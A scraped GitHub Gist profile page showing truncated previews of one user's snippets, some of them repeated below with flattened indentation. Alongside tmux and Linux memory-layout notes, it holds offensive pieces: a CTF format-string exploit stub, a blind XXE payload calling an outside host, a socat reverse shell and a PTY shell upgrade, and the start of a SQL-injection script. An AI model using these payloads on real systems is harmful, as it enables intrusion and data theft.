Muh. Fani Akbar rhamaa

## baby.py
from pwn import *
from libformatstr import *

file = ELF("./32_new")
flag = 0x0804870b

r = remote("163.172.176.29",9035)

r.recvuntil("name?")

## tmux.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rhamaa
                / tmux.md
            
            
              Created
              January 5, 2018 03:19
                — forked from andreyvit/tmux.md
            
              
                tmux cheatsheet
              
          
    tmux cheat sheet

(C-x means ctrl+x, M-x means alt+x)
Prefix key

The default prefix is C-b. If you (or your muscle memory) prefer C-a, you need to add this to ~/.tmux.conf:
remap prefix to Control + a


## memory_layout.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              0 stars
            
          
                rhamaa
                / memory_layout.md
            
            
              Created
              January 29, 2018 08:34
                — forked from CMCDragonkai/memory_layout.md
            
              
                Linux: Understanding the Memory Layout of Linux Executables
              
          
    Understanding the Memory Layout of Linux Executables

Required tools for playing around with memory:

hexdump
objdump
readelf
xxd
gcore


## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## teainside_asm_chall.asm
global _start

section .data
    aa  db '1234567890a',0
    len equ $-aa

section .text


## search.py
# search.py
# Source https://ctftime.org/writeup/10851

def search(obj, max_depth):

    visited_clss = []
    visited_objs = []

    def visit(obj, path='obj', depth=0):
        yield path, obj

## pet-snippet.toml
[[snippets]]
  description = "Python PTY Bash"
  command = "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
  output = "\"\""

[[snippets]]
  description = "[Reverse Shell] Socat Reverse Shell"
  command = "socat file:`tty`,raw,echo=0 tcp-listen:<PORT=4444> #Listener socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<HOST>:<PORT=4444> #Victim"
  output = "\"\""

## apache2_logs_parse.py
# Source : https://mmas.github.io/read-apache-access-log-pandas
# https://mmas.github.io/analyze-apache-access-log-pandas

import re
import pandas as pd
from datetime import datetime
import pytz

from IPython import embed

## retention_delete_s3.sh
# Source : https://stackoverflow.com/questions/50467698/how-to-delete-files-older-than-7-days-in-s3

aws s3 ls BUCKETNAME/ | while read -r line;
       do
        createDate=`echo $line|awk {'print $1" "$2'}`
        createDate=`date -d"$createDate" +%s`
        olderThan=`date --date "7 days ago" +%s`
        if [[ $createDate -lt $olderThan ]]
           then
            fileName=`echo $line|awk {'print $4'}`

## sqli_exp_binary_search_string.py
#!/usr/bin/env python3
import requests

client = requests.Session()
debug = False

def post(url, data, headers=None, proxy=False):
    if not headers:
        headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
	from pwn import *
	from libformatstr import *

	file = ELF("./32_new")
	flag = 0x0804870b

	r = remote("163.172.176.29",9035)

	r.recvuntil("name?")
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	global _start

	section .data
	aa db '1234567890a',0
	len equ $-aa

	section .text
	# search.py
	# Source https://ctftime.org/writeup/10851

	def search(obj, max_depth):

	visited_clss = []
	visited_objs = []

	def visit(obj, path='obj', depth=0):
	yield path, obj
	[[snippets]]
	description = "Python PTY Bash"
	command = "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
	output = "\"\""

	[[snippets]]
	description = "[Reverse Shell] Socat Reverse Shell"
	command = "socat file:`tty`,raw,echo=0 tcp-listen:<PORT=4444> #Listener socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<HOST>:<PORT=4444> #Victim"
	output = "\"\""
	# Source : https://mmas.github.io/read-apache-access-log-pandas
	# https://mmas.github.io/analyze-apache-access-log-pandas

	import re
	import pandas as pd
	from datetime import datetime
	import pytz

	from IPython import embed
	# Source : https://stackoverflow.com/questions/50467698/how-to-delete-files-older-than-7-days-in-s3

	aws s3 ls BUCKETNAME/ \| while read -r line;
	do
	createDate=`echo $line\|awk {'print $1" "$2'}`
	createDate=`date -d"$createDate" +%s`
	olderThan=`date --date "7 days ago" +%s`
	if [[ $createDate -lt $olderThan ]]
	then
	fileName=`echo $line\|awk {'print $4'}`
	#!/usr/bin/env python3
	import requests

	client = requests.Session()
	debug = False

	def post(url, data, headers=None, proxy=False):
	if not headers:
	headers = {}
	headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'